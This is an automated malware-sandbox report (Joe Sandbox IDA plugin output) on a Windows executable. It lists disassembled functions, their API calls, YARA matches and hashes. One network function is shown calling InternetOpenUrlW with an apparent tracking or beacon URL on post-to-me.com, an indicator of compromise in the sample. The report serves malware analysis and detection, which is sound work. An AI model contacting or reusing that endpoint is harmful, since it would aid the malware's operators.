                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                    • Instruction ID: 51079ad2349f57c62e19f317a21cfc612d69c7c81c8895b74a169e290774fa1b
                                                    • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                    • Instruction Fuzzy Hash: 53F0863918463137D3162734EC45F2A2A2A7BC3B62F610124FD14D22D0EB65850A852D
                                                    Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                      • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                      • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                      • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                    • String ID:
                                                    • API String ID: 4266703842-0
                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                    • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                    • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                    Function 02507B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 025029A4: TlsGetValue.KERNEL32(?,?,02500DC2,02502ECF,00000000,?,02500DA0,?,?,?,00000000,?,00000000), ref: 025029AA
                                                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02507BB1
                                                      • Part of subcall function 0251121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02511241
                                                      • Part of subcall function 0251121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0251125A
                                                      • Part of subcall function 0251121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 025112D0
                                                      • Part of subcall function 0251121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 025112D8
                                                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02507BBF
                                                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02507BC9
                                                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02507BD3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02507BF1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                    • String ID:
                                                    • API String ID: 4266703842-0
                                                    • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                    • Instruction ID: 128c8faadb6a23e0e41befafa7ec6e1743d5cf88412a78bea7df54ccc2076bc9
                                                    • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                    • Instruction Fuzzy Hash: FFF0C231A0061A67CA15B675CCE496EFA67BFC0B14B04416AD810932D0EF65AE058ED9
                                                    Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00439E5D
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 00439E6F
                                                    • _free.LIBCMT ref: 00439E81
                                                    • _free.LIBCMT ref: 00439E93
                                                    • _free.LIBCMT ref: 00439EA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                    • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                    • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                    Function 0252A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 0252A0C4
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252A0D6
                                                    • _free.LIBCMT ref: 0252A0E8
                                                    • _free.LIBCMT ref: 0252A0FA
                                                    • _free.LIBCMT ref: 0252A10C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                    • Instruction ID: 49e0e56d27ce87afa46d1020b2e5d60a022b7063557b260ead57f4ddb3812665
                                                    • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                    • Instruction Fuzzy Hash: C4F0C232104234BB8260EB14E8C2C167BDEBB4A3607640855F008C7BC1CB34F8958E1D
                                                    Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00431748
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 0043175A
                                                    • _free.LIBCMT ref: 0043176D
                                                    • _free.LIBCMT ref: 0043177E
                                                    • _free.LIBCMT ref: 0043178F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                    • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                    • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                    Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                    • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                    • String ID:
                                                    • API String ID: 2583373041-0
                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                    • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                    • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                    Function 02521991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 025219AF
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 025219C1
                                                    • _free.LIBCMT ref: 025219D4
                                                    • _free.LIBCMT ref: 025219E5
                                                    • _free.LIBCMT ref: 025219F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                    • Instruction ID: c19ee92717a28743a420fe942887dfec31e53352acd64ace55db4b2afdf160dd
                                                    • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                    • Instruction Fuzzy Hash: EAF0F970900731AB9B616B14ED804053B65BF0A76270002A6F406967F2C778A967DF8E
                                                    Function 0250CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0250CF36
                                                    • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0250CF67
                                                    • GetCurrentThread.KERNEL32 ref: 0250CF70
                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0250CF83
                                                    • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0250CF8C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                    • String ID:
                                                    • API String ID: 2583373041-0
                                                    • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                    • Instruction ID: a9d9303bdd60858153795f5fad366ba4fa9c92ef171ceac1779f902c5f188d01
                                                    • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                    • Instruction Fuzzy Hash: 03F0A732201501EBC625EF60EED08BAB777FFC4621300464DD587066D0CF21A846DB6A
                                                    Function 024F2E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024F2E8E
                                                      • Part of subcall function 024F1321: _wcslen.LIBCMT ref: 024F1328
                                                      • Part of subcall function 024F1321: _wcslen.LIBCMT ref: 024F1344
                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024F30A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InternetOpen_wcslen
                                                    • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                    • API String ID: 3381584094-4083784958
                                                    • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                    • Instruction ID: 4cb6def2bd0528b7af3db88704aaf6ea162310fc3737c47df815f64ab3a0d8ba
                                                    • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                    • Instruction Fuzzy Hash: 24514095A55344A9E320EFB0BC46B723378FF58712F10643BD518CB2B2E7A19984871E
                                                    Function 02518937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0251896A
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 02518A23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: fB$csm
                                                    • API String ID: 3480331319-1586063737
                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                    • Instruction ID: 79303e9f68864098c8eac7b62325876510214d4fe099db37f3188bb56fd07a99
                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                    • Instruction Fuzzy Hash: 8641E734A00249EBFF20DF28C888AAE7FB5BF44328F148555D9155B391D736D901CF99
                                                    Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ssB9bjDQPf.exe,00000104), ref: 0042F753
                                                    • _free.LIBCMT ref: 0042F81E
                                                    • _free.LIBCMT ref: 0042F828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                    • API String ID: 2506810119-472693577
                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                    • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                    • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                    Function 0251F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ssB9bjDQPf.exe,00000104), ref: 0251F9BA
                                                    • _free.LIBCMT ref: 0251FA85
                                                    • _free.LIBCMT ref: 0251FA8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\ssB9bjDQPf.exe
                                                    • API String ID: 2506810119-472693577
                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                    • Instruction ID: 12ed726f210b26be16b7f651526d9f1b124c4b28e42ec77104d2f29fd898e3e4
                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                    • Instruction Fuzzy Hash: 25318F71A00359EBEB21DF99DC80D9EBBFDFF89310F104066E80597261D7749A40CBA8
                                                    Function 024FC87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024FC8DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8Throw
                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                    • API String ID: 2005118841-1866435925
                                                    • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction ID: b39ff94a78c38b6301491a8506224621dd3c4d827cfe64ff5bff1fc0ce9e92dd
                                                    • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                    • Instruction Fuzzy Hash: F7F02B72C4060C7ADB84E554CCC1BEB33989B85316F04806BDF42AB182EB689949CBA4
                                                    Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                    • String ID: F(@
                                                    • API String ID: 3213686812-2698495834
                                                    • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                    • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                    • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                    • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                    Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                    • String ID: F(@
                                                    • API String ID: 3213686812-2698495834
                                                    • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                    • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                    • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                    • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                    Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                    • String ID: pScheduler
                                                    • API String ID: 1381464787-923244539
                                                    • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                    • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                    • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                    • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                    Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                    • String ID: pContext
                                                    • API String ID: 1990795212-2046700901
                                                    • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                    • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                    • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                    • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                    Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                    • _free.LIBCMT ref: 0042E069
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CloseFreeHandleLibrary_free
                                                    • String ID: B
                                                    • API String ID: 621396759-3071617958
                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                    • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                    • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                    Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                    • String ID: pScheduler$version
                                                    • API String ID: 1687795959-3154422776
                                                    • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                    • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                    • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                    • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                    Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
